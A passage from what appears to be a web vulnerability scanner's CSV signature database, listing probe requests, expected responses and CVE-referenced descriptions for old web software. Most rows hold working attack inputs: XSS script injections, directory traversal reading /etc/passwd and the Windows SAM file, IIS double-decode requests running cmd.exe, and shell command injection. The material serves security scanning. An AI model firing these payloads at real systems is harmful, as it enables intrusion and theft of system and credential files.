CA-2000-02.\",\"\",\"\"\n\"003276\",\"5458\",\"4\",\"/webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003277\",\"5458\",\"4\",\"/webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003278\",\"5458\",\"4\",\"@CGIDIRScvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003279\",\"5458\",\"4\",\"@CGIDIRScvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003280\",\"5459\",\"4\",\"/webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003281\",\"5459\",\"4\",\"/webtools/bonsai/cvslog.cgi?file=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003282\",\"5459\",\"4\",\"@CGIDIRScvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003283\",\"5459\",\"4\",\"@CGIDIRScvslog.cgi?file=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003284\",\"5460\",\"4\",\"/webtools/bonsai/cvsblame.cgi?file=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003285\",\"5460\",\"4\",\"@CGIDIRScvsblame.cgi?file=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003286\",\"5461\",\"4\",\"/webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003287\",\"5461\",\"4\",\"@CGIDIRSshowcheckins.cgi?person=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003288\",\"6659\",\"4\",\"/JUNK(223)<font%20size=50>DEFACED<!--//--\",\"GET\",\"<font size=50>DEFACED<\",\"\",\"\",\"not found\",\"\",\"MyWebServer 1.0.2 is vulnerable to HTML injection. Upgrade to a later version.\",\"\",\"\"\n\"003289\",\"5523\",\"d\",\"/MWS/HandleSearch.html?searchTarget=test&B1=Submit\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"MyWebServer 1.0.2 may be vulnerable to a buffer overflow (untested). Upgrade to a later version if 990b of searched data crashes the server.\",\"\",\"\"\n\"003290\",\"554\",\"7\",\"@CGIDIRSa1disp3.cgi?../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers read arbitrary files on the host.\",\"\",\"\"\n\"003291\",\"554\",\"7\",\"@CGIDIRSa1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers read arbitrary files on the host.\",\"\",\"\"\n\"003292\",\"554\",\"7\",\"@CGIDIRSa1stats/a1disp3.cgi?../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Remote file retrieval.\",\"\",\"\"\n\"003293\",\"554\",\"7\",\"@CGIDIRSa1stats/a1disp4.cgi?../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Remote file retrieval.\",\"\",\"\"\n\"003294\",\"556\",\"8\",\"/certsrv/..%255cwinnt/system32/cmd.exe?/c+dir\",\"GET\",\"<DIR>\",\"\",\"\",\"\",\"\",\"IIS is vulnerable to a double-decode bug that allows commands to be executed on the system. CVE-2001-0333. BID-2708.\",\"\",\"\"\n\"003295\",\"556\",\"8\",\"/cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir\",\"GET\",\"<DIR>\",\"\",\"\",\"\",\"\",\"IIS is vulnerable to a double-decode bug that allows commands to be executed on the system. CVE-2001-0333. BID-2708.\",\"\",\"\"\n\"003296\",\"556\",\"8\",\"/iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir\",\"GET\",\"<DIR>\",\"\",\"\",\"\",\"\",\"IIS is vulnerable to a double-decode bug that allows commands to be executed on the system. CVE-2001-0333. BID-2708.\",\"\",\"\"\n\"003297\",\"556\",\"8\",\"/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir\",\"GET\",\"<DIR>\",\"\",\"\",\"\",\"\",\"IIS is vulnerable to a double-decode bug that allows commands to be executed on the system. CVE-2001-0333. BID-2708.\",\"\",\"\"\n\"003298\",\"556\",\"8\",\"/pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir\",\"GET\",\"<DIR>\",\"\",\"\",\"\",\"\",\"IIS is vulnerable to a double-decode bug that allows commands to be executed on the system. CVE-2001-0333. BID-2708.\",\"\",\"\"\n\"003299\",\"556\",\"8\",\"/rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir\",\"GET\",\"<DIR>\",\"\",\"\",\"\",\"\",\"IIS is vulnerable to a double-decode bug that allows commands to be executed on the system. CVE-2001-0333. BID-2708.\",\"\",\"\"\n\"003300\",\"556\",\"8\",\"/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir\",\"GET\",\"<DIR>\",\"\",\"\",\"\",\"\",\"IIS is vulnerable to a double-decode bug that allows commands to be executed on the system. CVE-2001-0333. BID-2708.\",\"\",\"\"\n\"003301\",\"556\",\"8\",\"/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver\",\"GET\",\"\\[Version\\]\",\"\",\"\",\"\",\"\",\"IIS is vulnerable to a double-decode bug that allows commands to be executed on the system. CVE-2001-0333. BID-2708.\",\"\",\"\"\n\"003302\",\"556\",\"8\",\"/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir\",\"GET\",\"<DIR>\",\"\",\"\",\"\",\"\",\"IIS is vulnerable to a double-decode bug that allows commands to be executed on the system. CVE-2001-0333. BID-2708.\",\"\",\"\"\n\"003303\",\"562\",\"3\",\"/server-info\",\"GET\",\"200\",\"Server Information\",\"\",\"\",\"\",\"This gives a lot of Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts.\",\"\",\"\"\n\"003304\",\"5689\",\"4\",\"@CGIDIRSnamazu.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Namazu search engine found. Vulnerable to XSS attacks (fixed 2001-11-25). Attacker could write arbitrary files outside docroot (fixed 2000-01-26). CA-2000-02.\",\"\",\"\"\n\"003305\",\"5692\",\"3\",\"/oekaki/\",\"GET\",\"\\.conf\",\"\",\"\",\"404\",\"\",\"The PaintBBS Server may allow unauthorized access to the config files.\",\"\",\"\"\n\"003306\",\"5709\",\"3\",\"/.nsconfig\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Contains authorization information\",\"\",\"\"\n\"003307\",\"5709\",\"3\",\"@CGIDIRS.nsconfig\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Contains authorization information\",\"\",\"\"\n\"003308\",\"582\",\"2\",\"/?D=A\",\"GET\",\"[Ii]ndex [Oo]f \\\\\\/\",\"\",\"\",\"\",\"\",\"Apache allows directory listings by requesting.\",\"\",\"\"\n\"003309\",\"582\",\"2\",\"/?N=D\",\"GET\",\"[Ii]ndex [Oo]f \\\\\\/\",\"\",\"\",\"\",\"\",\"Apache allows directory listings by requesting.\",\"\",\"\"\n\"003310\",\"582\",\"2\",\"/?S=A\",\"GET\",\"[Ii]ndex [Oo]f \\\\\\/\",\"\",\"\",\"\",\"\",\"Apache allows directory listings by requesting.\",\"\",\"\"\n\"003311\",\"582\",\"23\",\"/?M=A\",\"GET\",\"[Ii]ndex [Oo]f \\\\\\/\",\"\",\"\",\"\",\"\",\"Apache allows directory listings. Upgrade Apache or disable directory indexing.\",\"\",\"\"\n\"003312\",\"583\",\"7\",\"/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1\",\"GET\",\"Reply from 127\\.0\\.0\\.1\",\"\",\"\",\"\",\"\",\"Specially formatted strings allow command execution. Upgrade to version 1.15 or higher. CVE-2000-0011.\",\"\",\"\"\n\"003313\",\"583\",\"7\",\"/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Specially formatted strings allow command execution. Upgrade to version 1.15 or higher. CVE-2000-0011.\",\"\",\"\"\n\"003314\",\"596\",\"3\",\"/dc/auth_data/auth_user_file.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.\",\"\",\"\"\n\"003315\",\"596\",\"3\",\"/dc/orders/orders.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.\",\"\",\"\"\n\"003316\",\"596\",\"3\",\"/dcshop/auth_data/auth_user_file.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.\",\"\",\"\"\n\"003317\",\"596\",\"3\",\"/dcshop/orders/orders.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.\",\"\",\"\"\n\"003318\",\"635\",\"8\",\"@CGIDIRSshop.pl/page=;cat%20shop.pl|\",\"GET\",\"\\\\\\/perl\",\"\",\"\",\"\",\"\",\"Shopping Cart (Hassan) allows execution of remote commands. CVE-2001-0985.\",\"\",\"\"\n\"003319\",\"641\",\"7\",\"@CGIDIRSview_item?HTML_FILE=../../../../../../../../../../etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"sglMerchant allows reading of remote files. CVE-2001-1019.\",\"\",\"\"\n\"003320\",\"644\",\"3\",\"/.FBCIndex\",\"GET\",\"Bud2\",\"\",\"\",\"\",\"\",\"This file on OSX contains the source of the files in the directory. http://www.securiteam.com/securitynews/5LP0O005FS.html\",\"\",\"\"\n\"003321\",\"645\",\"7\",\"@CGIDIRSshopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"ShopPlus Cart allows arbitrary command execution. CVE-2001-0992.\",\"\",\"\"\n\"003322\",\"646\",\"8\",\"@CGIDIRSeshop.pl/seite=;cat%20eshop.pl|\",\"GET\",\"\\\\\\/perl\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to execute commands on the remote server. CVE-2001-1014.\",\"\",\"\"\n\"003323\",\"6659\",\"4\",\"/JUNK(223)<font%20size=50><script>alert(11)</script><!--//--\",\"GET\",\"<script>alert\\(11\\)<\\/script>\",\"\",\"\",\"\",\"\",\"MyWebServer 1.0.2 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003324\",\"6661\",\"7\",\"@CGIDIRSion-p.exe?page=c:\\winnt\\repair\\sam\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Ion-P allows remote file retrieval.\",\"\",\"\"\n\"003325\",\"6661\",\"7\",\"@CGIDIRSion-p?page=../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Ion-P allows remote file retrieval.\",\"\",\"\"\n\"003326\",\"6663\",\"7\",\"/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini\",\"GET\",\"boot loader\",\"\",\"\",\"\",\"\",\"GoAhead Web Server 2.1 is vulnerable to arbitrary file retrieval, upgrade to the latest version.\",\"\",\"\"\n\"003327\",\"6663\",\"7\",\"/..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini\",\"GET\",\"\\[windows\\]\",\"\\[fonts\\]\",\"\",\"\",\"\",\"GoAhead Web Server 2.1 is vulnerable to arbitrary file retrieval.\",\"\",\"\"\n\"003328\",\"6666\",\"6\",\"/cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"HP Instant TopTools GoAhead WebServer hpnst.exe may be vulnerable to a DoS.\",\"\",\"\"\n\"003329\",\"6670\",\"3\",\"/applist.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Citrix server may allow remote users to view applications installed without authenticating.\",\"\",\"\"\n\"003330\",\"6671\",\"3\",\"/launch.asp?NFuse_Application=LookOut&NFuse_MIMEExtension=.ica\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Citrix server may reveal sensitive information by accessing the 'advanced' tab on hte login screen.\",\"\",\"\"\n\"003331\",\"6672\",\"a\",\"/_layouts/alllibs.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. Bugtraq 03-11-19 post by arkanian@hacker.am\",\"\",\"\"\n\"003332\",\"6672\",\"a\",\"/_layouts/settings.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. Bugtraq 03-11-19 post by arkanian@hacker.am\",\"\",\"\"\n\"003333\",\"6672\",\"a\",\"/_layouts/userinfo.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. Bugtraq 03-11-19 post by arkanian@hacker.am\",\"\",\"\"\n\"003334\",\"6673\",\"8\",\"@CGIDIRSindex.pl\",\"GET\",\"Powered By WebGUI 4\\.6\\.8\",\"\",\"\",\"\",\"\",\"WebGUI version 4.6.8, according to the documentation, may allow arbitrary code execution. http://freshmeat.net/users/rizen/.\",\"\",\"\"\n\"003335\",\"6694\",\"3\",\"/.DS_Store\",\"GET\",\"Bud1\",\"\",\"\",\"\",\"\",\"Apache on Mac OSX will serve the .DS_Store file, which contains sensitive information. Configure Apache to ignore this file or upgrade to a newer version.\",\"\",\"\"\n\"003336\",\"6695\",\"3\",\"@CGIDIRSrwcgi60\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle report server reveals system information without authorization. See Oracle note 133957.1 - Restricting Access to the Reports Server Environment and Output\",\"\",\"\"\n\"003337\",\"6695\",\"3\",\"@CGIDIRSrwcgi60/showenv\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle report server reveals system information without authorization. See Oracle note 133957.1 - Restricting Access to the Reports Server Environment and Output\",\"\",\"\"\n\"003338\",\"6696\",\"8\",\"@CGIDIRSindex.pl\",\"GET\",\"Powered By WebGUI 4\\.6\\.9\",\"\",\"\",\"\",\"\",\"WebGUI version 4.6.9 has a 'very obsure and unlikely security hole' according to the documentation. .\",\"\",\"\"\n\"003339\",\"6697\",\"3\",\"@CGIDIRSindex.pl\",\"GET\",\"Powered By WebGUI 4\\.5\\.0\",\"\",\"\",\"\",\"\",\"WebGUI version 4.5.0 according to the documentation, a user could view collateral data of a wobject if the URL is known. http://freshmeat.net/users/rizen/.\",\"\",\"\"\n\"003340\",\"6698\",\"8\",\"@CGIDIRSclassifieds/classifieds.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Mike's Classifieds CGI contains a bug that allows arbitrary command execution on the server (untested), see http://freshmeat.net/projects/myclassifieds/\",\"\",\"\"\n\"003341\",\"6699\",\"8\",\"@CGIDIRScalendar/index.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Mike's Calendar CGI contains a bug that allows arbitrary command execution (version 1.4), see http://freshmeat.net/projects/mycalendar/\",\"\",\"\"\n\"003342\",\"670\",\"3\",\"/stronghold-info\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Redhat Stronghold from versions 2.3 up to 3.0 discloses sensitive information. This gives information on configuration. CVE-2001-0868.\",\"\",\"\"\n\"003343\",\"670\",\"3\",\"/stronghold-status\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Redhat Stronghold from versions 2.3 up to 3.0 discloses sensitive information. CVE-2001-0868.\",\"\",\"\"\n\"003344\",\"674\",\"3\",\"/blah-whatever.jsp\",\"GET\",\"JSP file \\\"\",\"\",\"\",\"\",\"\",\"The Apache Tomcat 3.1 server reveals the web root path when requesting a non-existent JSP file. CVE-2000-0759.\",\"\",\"\"\n\"003345\",\"677\",\"7\",\"/gallery/index.php?include=../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Gallery allows files to be read remotely. CVE-2001-0900.\",\"\",\"\"\n\"003346\",\"677\",\"7\",\"/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Gallery Addon for PHP-Nuke allows files to be read remotely. CVE-2001-0900.\",\"\",\"\"\n\"003347\",\"684\",\"4\",\"@CGIDIRS../../../../../../../../../../WINNT/system32/ipconfig.exe\",\"GET\",\"IP Configuration\",\"\",\"\",\"\",\"\",\"Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands.\",\"\",\"\"\n\"003348\",\"684\",\"4\",\"@CGIDIRSNUL/../../../../../../../../../WINNT/system32/ipconfig.exe\",\"GET\",\"IP Configuration\",\"\",\"\",\"\",\"\",\"Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands.\",\"\",\"\"\n\"003349\",\"684\",\"4\",\"@CGIDIRSPRN/../../../../../../../../../WINNT/system32/ipconfig.exe\",\"GET\",\"IP Configuration\",\"\",\"\",\"\",\"\",\"Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands.\",\"\",\"\"\n\"003350\",\"694\",\"7\",\"/phprocketaddin/?page=../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host.\",\"\",\"\"\n\"003351\",\"698\",\"4\",\"@CGIDIRSstore/agora.cgi?cart_id=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Agora.cgi is vulnerable to Cross Site Scripting (XSS), CVE-2001-1199, CA-2000-02.\",\"\",\"\"\n\"003352\",\"7\",\"6\",\"/iissamples/exair/howitworks/Code.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Scripts within the Exair package on IIS 4 can be used for a DoS against the server. CVE-1999-0449. BID-193.\",\"\",\"\"\n\"003353\",\"7\",\"6\",\"/iissamples/exair/howitworks/Codebrw1.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This is a default IIS script/file which should be  removed, it may allow a DoS against the server. CVE-1999-0738. MS99-013. CVE-1999-0449. BID-193.\",\"\",\"\"\n\"003354\",\"7\",\"7\",\"/msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini\",\"GET\",\"\\[fonts\\]\",\"\",\"\",\"\",\"\",\"This allows attackers to read arbitrary files on the host. CVE-1999-0736. MS99-013.\",\"\",\"\"\n\"003355\",\"701\",\"4\",\"/pls/dadname/htp.print?cbuf=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Oracle 9iAS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003356\",\"701\",\"4\",\"/pls/help/<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Oracle 9iAS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003357\",\"707\",\"3\",\"/demo/ojspext/events/globals.jsa\",\"GET\",\"event:application_OnStart\",\"\",\"\",\"\",\"\",\"Oracle 9iAS allows .jsa files to be retrieved, which may contain sensitive information.\",\"\",\"\"\n\"003358\",\"707\",\"3\",\"/globals.jsa\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle globals.jsa file\",\"\",\"\"\n\"003359\",\"711\",\"7\",\"/pls/sample/admin_/help/..%255cplsql.conf\",\"GET\",\"Directives added for mod-plsql\",\"\",\"\",\"\",\"\",\"Oracle 9iAS allows mod_plsql to perform a directory traversal.\",\"\",\"\"\n\"003360\",\"712\",\"3\",\"/servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml\",\"GET\",\"On a PRODUCTION system\",\"\",\"\",\"\",\"\",\"Oracle 9iAS configuration file found - see Bugtraq #4290.\",\"\",\"\"\n\"003361\",\"721\",\"7\",\"/..%252f..%252f..%252f..%252f..%252f../windows/repair/sam\",\"GET\",\"200\",\"\",\"\",\"Forbidden\",\"\",\"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.\",\"\",\"\"\n\"003362\",\"721\",\"7\",\"/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam\",\"GET\",\"200\",\"\",\"\",\"Forbidden\",\"\",\"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.\",\"\",\"\"\n\"003363\",\"721\",\"7\",\"/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._\",\"GET\",\"200\",\"\",\"\",\"Forbidden\",\"\",\"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.\",\"\",\"\"\n\"003364\",\"721\",\"7\",\"/..%255c..%255c..%255c..%255c..%255c../windows/repair/sam\",\"GET\",\"200\",\"\",\"\",\"Forbidden\",\"\",\"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.\",\"\",\"\"\n\"003365\",\"721\",\"7\",\"/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam\",\"GET\",\"200\",\"\",\"\",\"Forbidden\",\"\",\"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.\",\"\",\"\"\n\"003366\",\"721\",\"7\",\"/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._\",\"GET\",\"200\",\"\",\"\",\"Forbidden\",\"\",\"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.\",\"\",\"\"\n\"003367\",\"721\",\"7\",\"/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam\",\"GET\",\"200\",\"\",\"\",\"Forbidden\",\"\",\"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.\",\"\",\"\"\n\"003368\",\"721\",\"7\",\"/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam\",\"GET\",\"200\",\"\",\"\",\"Forbidden\",\"\",\"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.\",\"\",\"\"\n\"003369\",\"721\",\"7\",\"/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._\",\"GET\",\"200\",\"\",\"\",\"Forbidden\",\"\",\"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.\",\"\",\"\"\n\"003370\",\"724\",\"8\",\"/ans.pl?p=../../../../../usr/bin/id|&blah\",\"GET\",\"uid=\",\"\",\"\",\"\",\"\",\"Avenger's News System allows commands to be issued remotely.  http://ans.gq.nu/ default admin string 'admin:aaLR8vE.jjhss:root@127\\.0\\.0\\.1', password file location 'ans_data/ans.passwd'\",\"\",\"\"\n\"003371\",\"724\",\"8\",\"/ans/ans.pl?p=../../../../../usr/bin/id|&blah\",\"GET\",\"uid=\",\"\",\"\",\"\",\"\",\"Avenger's News System allows commands to be issued remotely.\",\"\",\"\"\n\"003372\",\"761\",\"8\",\"@CGIDIRScsSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"csSearch (http://www.cgiscript.net/) has a major flaw that allows Perl to be executed remotely. Upgrade to a version higher than 2.3. CVE-2002-0495.\",\"\",\"\"\n\"003373\",\"768\",\"3\",\"/?\\\"><script>alert('Vulnerable');</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"IIS is vulnerable to Cross Site Scripting (XSS). See MS02-018, CVE-2002-0075, SNS-49, CA-2002-09\",\"\",\"\"\n\"003374\",\"3341\",\"3\",\"/JUNK(10)abcd.html\",\"GET\",\"\\+ displayresult \\+\",\"\",\"\",\"\",\"\",\"The IIS 4.0, 5.0 and 5.1 server may be vulnerable to Cross Site Scripting (XSS) in redirect error messages.\",\"\",\"\"\n\"003375\",\"782\",\"6\",\"/iissamples/exair/howitworks/codebrws.asp\",\"GET\",\"ASP Source code browser\",\"\",\"\",\"\",\"\",\"This is a default IIS script/file that should be removed. It may allow a DoS against the server or a DoS. XF-2383 BID-0167.\",\"\",\"\"\n\"003376\",\"783\",\"36\",\"/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa\",\"GET\",\"OBJECT RUNAT=Server\",\"\",\"\",\"\",\"\",\"ServletExec 4.1 ISAPI Java Servlet/JSP Engine for IIS can reveal source code. The server may also be vulnerable to a DoS attack by requesting a long file name ending in .jsp\",\"\",\"\"\n\"003377\",\"784\",\"36\",\"/servlet/com.newatlanta.servletexec.JSP10Servlet/\",\"GET\",\"The file was not found\",\"\",\"\",\"\",\"\",\"ServletExec 4.1 ISAPI Java Servlet/JSP Engine for IIS discloses the web root. The server may also be vulnerable to a DoS attack by requesting a long file name ending in .jsp\",\"\",\"\"\n\"003378\",\"789\",\"3\",\"/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp\",\"GET\",\"Path not found\",\"\",\"\",\"\",\"\",\"CodeBrws.asp can be used to determine if a file system path exists or not. CVE-1999-0739. MS99-013.\",\"\",\"\"\n\"003379\",\"789\",\"5\",\"/iissamples/sdk/asp/docs/codebrws.asp\",\"GET\",\"View Active Server Page Source\",\"\",\"\",\"\",\"\",\"IIS 5 comes with an ASP that allows remote code to viewed. All default files in /IISSamples should be removed. CVE-1999-0739. MS99-013.\",\"\",\"\"\n\"003380\",\"789\",\"5\",\"/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"IIS may be vulnerable to source code viewing via the example CodeBrws.asp file. Remove all default files from the web root. CVE-1999-0739. MS99-013.\",\"\",\"\"\n\"003381\",\"859\",\"7\",\"/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini\",\"GET\",\"\\[windows\\]\",\"\",\"\",\"\",\"\",\"Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above. 